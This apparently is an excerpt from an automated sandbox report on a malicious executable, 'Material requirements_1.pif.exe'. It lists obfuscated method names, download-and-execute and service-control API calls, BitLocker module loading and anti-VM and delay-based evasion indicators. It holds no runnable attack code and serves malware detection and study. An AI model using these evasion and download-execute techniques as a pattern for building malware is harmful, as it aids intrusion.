                Source: 0.2.Material requirements_1.pif.exe.7430000.7.raw.unpack, ODy3AcyoxB4Nfbptyy.csHigh entropy of concatenated method names: 'N72xVB9kVx', 'IP7xD7SKOw', 'GmFxCBeBIS', 'jxFxybOjy6', 'GCxx8CXB44', 'FqPx93A5lx', 'apkxGv7X74', 'qjHxjWMbUJ', 'O7SxwTv85d', 'WwqxWNEx7V'
                Source: 0.2.Material requirements_1.pif.exe.7430000.7.raw.unpack, c5MoKBUq8qvmpdLPkr.csHigh entropy of concatenated method names: 'RM8O0lJpm6', 'qf4OqAP7pH', 'qeZOcitTqd', 'gOpOKpGgRV', 's6dOnnBKhC', 'irDce3yiXE', 'gvxc1hNpZ5', 'pgjc2r1qiJ', 'NXicu1OKqV', 'NR0cRZZwVG'
                Source: 0.2.Material requirements_1.pif.exe.7430000.7.raw.unpack, hSx5Fvf2t2qMkrPqAm.csHigh entropy of concatenated method names: 'KepOr02QUK', 'sjtO4GrVWI', 'OwZOLKEPIg', 'bXiOVCsmxj', 'a7LODH5yhP', 'HpoObPBFY0', 'vXrOyyf1ql', 'IC3OSD9HEP', 'tKnZVZm5ooucld23Jfh', 'ls0oQZmnDQPunTd28tU'
                Source: 0.2.Material requirements_1.pif.exe.7430000.7.raw.unpack, aISE6MkWVU1tHktetQ.csHigh entropy of concatenated method names: 'ToString', 'ScF9tnqnss', 'lg19XSjeZM', 'JdL9hcW3JX', 'vDR9fp1mVg', 'mEy9sbvgWL', 'AYn9NlA8Kk', 'bUc9gok9uM', 'vvr95gq11u', 'h8e9i9gwMl'
                Source: 0.2.Material requirements_1.pif.exe.7430000.7.raw.unpack, xmYKJGAI6uNbPA6FLl.csHigh entropy of concatenated method names: 'KsMQCjP8yY', 'lgAQywpRWy', 'YtnQUeds0m', 'S7TQXqEuBJ', 'qtDQfRJ8sb', 'LB5Qs98bEb', 'cSyQgrJ3x4', 'Fs1Q5eN3B4', 'hnGQBM9BuW', 'cPqQtdO6UG'
                Source: 0.2.Material requirements_1.pif.exe.7430000.7.raw.unpack, Q2qYfI6wmsZigOBGuZ.csHigh entropy of concatenated method names: 'FW98BTg6wT', 'F4e8YwX87m', 'FqM86wUHKK', 'vWU8PrlgPA', 'YXE8XfxK9G', 'IlQ8hDSxuJ', 'AJA8f0ywWK', 'iTV8sEMuqY', 'F278N6I7ad', 'nT58gEaBf8'
                Source: 0.2.Material requirements_1.pif.exe.7430000.7.raw.unpack, bRGCNDiLG7EYfq4xZj.csHigh entropy of concatenated method names: 'aEYK42t9In', 'nNPKH0745U', 'qkVKLAYjby', 'ujmKV3vjuS', 'iUDKlCXOFP', 'CvNKDoRloW', 'HnvKbsxgFI', 'sqvKCFy6rP', 'NK8KylTiD7', 'vDjKSvPEq4'
                Source: 0.2.Material requirements_1.pif.exe.7430000.7.raw.unpack, llx0TaqgR8TBmw4VB1.csHigh entropy of concatenated method names: 'Dispose', 'QBSmR7giCC', 'NdJaXaffhG', 'vAQxvMgZ1i', 'T91mpGVTtN', 'TC6mzt2JCd', 'ProcessDialogKey', 'cw7aoT6jPT', 'mvCam5B0IB', 'k6MaaouI0l'
                Source: 0.2.Material requirements_1.pif.exe.7430000.7.raw.unpack, lW7pBiMxd5BWrJjUJI.csHigh entropy of concatenated method names: 'JXvG3hwEn9', 'MHbGZbTNFF', 'ToString', 'WyWGJJnTWe', 'q9CGqjfRUs', 'NNAGxOi13Z', 'AS6GcVcITs', 'mgoGO7d07y', 'HJfGKCRwAN', 'hZmGnpHCK7'
                Source: 0.2.Material requirements_1.pif.exe.7430000.7.raw.unpack, vT6jPTRZvC5B0IBT6M.csHigh entropy of concatenated method names: 'O5LwUuQIZ6', 'LBDwXGDySg', 'xxpwhHeca5', 'J8gwfXKQxg', 'yQfwsWpdZM', 'qNVwNc6jD4', 'sZ6wgcXYgW', 'FZEw5WunDX', 'ufEwiZNuUZ', 'OwZwBqfrwf'
                Source: 0.2.Material requirements_1.pif.exe.7430000.7.raw.unpack, omvIrPmob14E5fcrVR8.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'EsYWt0hBJC', 'OZ3WYRj5iJ', 'YP8WAZHUCA', 'KX4W6Gi4kW', 'W0RWPC3UDl', 'rrYWkmpRnd', 'aGEWMP0n7Q'
                Source: 0.2.Material requirements_1.pif.exe.7430000.7.raw.unpack, zKIuKsxf8qPDckMuAw.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'FvvaRSIgp6', 'gQpapHNXrx', 'ksqazadPPI', 'I28FoK5lnF', 'bkpFmm5BJC', 'l2cFa682rS', 'CJMFF9tJX5', 'RWCVefb0IAwxa03BdGv'
                Source: 0.2.Material requirements_1.pif.exe.7430000.7.raw.unpack, X4l6jezAlWdqIXtk64.csHigh entropy of concatenated method names: 'rPLWDSGWiG', 'hksWCdlhpa', 'OxZWyYCuQ2', 'cicWUHkD0C', 'hJoWXJ04k9', 'z84WfR8LUr', 'cf3WsswSKB', 'Em2Wr5Lvum', 'LAsW4jl2tT', 'vleWHAHdfJ'
                Source: 0.2.Material requirements_1.pif.exe.7430000.7.raw.unpack, hoe2Wddu8RsTrfs01r.csHigh entropy of concatenated method names: 'AGymKXjeaL', 'Rh7mn52HH7', 'ioxm3B4Nfb', 'YtymZyxk8X', 'Tvvm8vBF5M', 'aKBm9q8qvm', 'BLFdi49QZ2kvO9mP5Z', 'AkBkhuKS4jY4S40mkb', 'a78mmx5yxd', 'xpvmF6m8p3'
                Source: 0.2.Material requirements_1.pif.exe.7430000.7.raw.unpack, DNkgN82fNABS7giCCM.csHigh entropy of concatenated method names: 'IZ9w8gEnQA', 'L4BwGoyEAY', 'v8gwwtmhd7', 'XxIwINVwwe', 'h5hwvFhQQM', 'ocFwrRX3iE', 'Dispose', 'FUPjJaIdcy', 'rWWjqSNGrg', 'z8sjxayVk5'
                Source: 0.2.Material requirements_1.pif.exe.7430000.7.raw.unpack, gn6YHxgUYnQMt9eQgY.csHigh entropy of concatenated method names: 'VffKJdggpC', 'DcXKxhJg31', 'vg5KOwRqvw', 'sZ9OpG2Sdv', 'Tb7Oz5hvYZ', 'OQuKok0UC5', 'sQGKmKddBo', 'dTQKaJejov', 'pnOKF5xyuB', 'i6cKdDWkGf'
                Source: 0.2.Material requirements_1.pif.exe.7430000.7.raw.unpack, MO4jLka0yHQyk46IRI.csHigh entropy of concatenated method names: 'wWTLTli2L', 'cEeV0mT27', 'eeiDQhsFU', 'qjGb4KiAP', 'rYXyrkV4c', 'lu7SGlG0B', 'vej1qWJmShifR6c9HN', 'bvUAHs2xMgZDO9vL6c', 'LVojS40qW', 'SmgWbQiDE'
                Source: 0.2.Material requirements_1.pif.exe.7430000.7.raw.unpack, q0X39GmmtPhntPZMeBf.csHigh entropy of concatenated method names: 'ACVWpuxh8p', 'AZAWzy19O0', 'XATIoaQ3vg', 'xdCIm2GZ6K', 'YxhIaBpyFC', 'qCUIFll8df', 'MjEIdOUiR6', 'IcnI0d5pvB', 'QQsIJCLfJ9', 'sAhIqW5bbB'
                Source: 0.2.Material requirements_1.pif.exe.7430000.7.raw.unpack, mPifxm1D3vFDQQOTHw.csHigh entropy of concatenated method names: 'LPFGuk5rat', 'OyNGpacJFF', 'UQAjoaSgSp', 'SbQjmLuKuR', 'bw3GtjsiUJ', 'Q3kGYOSANI', 'vnCGAHvN0F', 'cRjG62Bbiv', 'BNHGPFAPUw', 'KnTGky1M6N'
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_00406128 ShellExecuteW,URLDownloadToFileW,7_2_00406128
                Source: C:\Windows\System32\wbem\WMIADAP.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WmiApRpl\PerformanceJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_00419BD4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,7_2_00419BD4

                Hooking and other Techniques for Hiding and Protection

                barindex
                Loading BitLocker PowerShell Module
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_0041BCF3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,7_2_0041BCF3
                Source: C:\Windows\System32\wbem\WMIADAP.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\PROVIDERS\Performance Performance DataJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wbem\WMIADAP.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wbem\WMIADAP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wbem\WMIADAP.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: Material requirements_1.pif.exe PID: 6648, type: MEMORYSTR
                Delayed program exit found
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_0040E54F Sleep,ExitProcess,7_2_0040E54F
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeMemory allocated: 2CA0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeMemory allocated: 2D70000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeMemory allocated: 4D70000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeMemory allocated: 8DF0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeMemory allocated: 9DF0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeMemory allocated: 9FF0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeMemory allocated: AFF0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeMemory allocated: B650000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeMemory allocated: C650000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeMemory allocated: D650000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,7_2_004198D2
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6445Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3271Jump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeWindow / User API: threadDelayed 1817Jump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeWindow / User API: threadDelayed 8127Jump to behavior
                Source: C:\Windows\System32\wbem\WMIADAP.exeWindow / User API: threadDelayed 2045Jump to behavior
                Source: C:\Windows\System32\wbem\WMIADAP.exeWindow / User API: threadDelayed 898Jump to behavior
